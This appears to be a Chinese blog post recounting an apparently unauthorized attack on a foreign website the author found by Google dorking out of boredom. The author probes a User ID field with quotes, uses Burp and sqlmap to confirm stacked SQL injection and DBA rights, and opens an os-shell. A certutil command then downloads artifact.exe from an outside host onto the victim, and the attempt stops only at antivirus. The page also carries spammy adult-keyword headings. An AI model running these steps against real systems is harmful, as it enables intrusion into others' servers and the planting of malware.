日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

0x00:尋找漏洞點

某天閑著無聊用谷歌語法inurl:aspx?id=找到一個國外的某個站點。功能點比較簡單只有一個User ID:

一次半成功的滲透測試

 

0x01:檢測功能點

由于只有搜索框我們先來一個單引號看他是否報錯報。

一次半成功的滲透測試

 

我們發(fā)現(xiàn)報錯了單引號,我們再來一個單引號測試一下看看能不能回顯,頁面正常。

一次半成功的滲透測試

 

我們發(fā)現(xiàn)隨便輸入點內(nèi)容網(wǎng)站回顯正常提示xxxx。說明有可能存在sql注入,我們繼續(xù)往下看。

一次半成功的滲透測試

 

0x02:信息收集

這里利用火狐瀏覽器的WAppalyzer插件看了一下網(wǎng)站信息。IIS版本為7.5有文件上傳IIS解析漏洞。

一次半成功的滲透測試

 

下面是用在線網(wǎng)站探查到的端口情況,還開一個1433端口。

一次半成功的滲透測試

 

0x03:Burp抓包+sqlmap檢測

既然剛才前面的輸入框會引起報錯有可能存在sql注入那我是否可以考慮抓個數(shù)據(jù)包放到sqlmap里面跑跑看能不能跑出一些關(guān)鍵信息。下面利用Burp抓到包然后保存為x.txt。這里們加*號就是指定注入點。

一次半成功的滲透測試

 

放到sqlmap里面,已經(jīng)提示可以注入。

一次半成功的滲透測試

 

我們繼續(xù)往下看,下面是注入點。

一次半成功的滲透測試

 

有堆疊注入我們看看堆疊可以直接sqlmap --is-dba 看看是不是管理員權(quán)限如果我們可以利用sqlmap –-os-shelll 直接寫入木馬 拿到webshell或者反彈shell直接

這里看到dba的權(quán)限為True代表有機會寫入一句話從而獲取到也給低權(quán)限的shell。

一次半成功的滲透測試

 

這里可以直接sqlmap –os-shell,當出現(xiàn)os-shell的時候代表成功。

一次半成功的滲透測試

 

我們輸入一條ipconfig簡單命令看看能不能執(zhí)行成功。然后判斷目標是否出網(wǎng)!如果不出網(wǎng)那傳木馬上去就扯犢子了,可以選擇傳webshell。

我們可以看到命令可以執(zhí)行

一次半成功的滲透測試

 

接下可以使用certutil.exe去接收一個惡意的文件。

命令certutil.exe -urlcache -split -f http:
//192.168.163.128:8080/artifact.exe c:artifact.exe // c:artifact.exe是保存路徑

這條命令遠程下載文件木馬保存到受害機上去

先查看一下當前的進程。

一次半成功的滲透測試

 

然后使用在線的殺毒識別。結(jié)果發(fā)現(xiàn)還真有防護,就此放棄。。。。。。

一次半成功的滲透測試

 

分享到:
標簽:滲透 測試
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運動步數(shù)有氧達人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定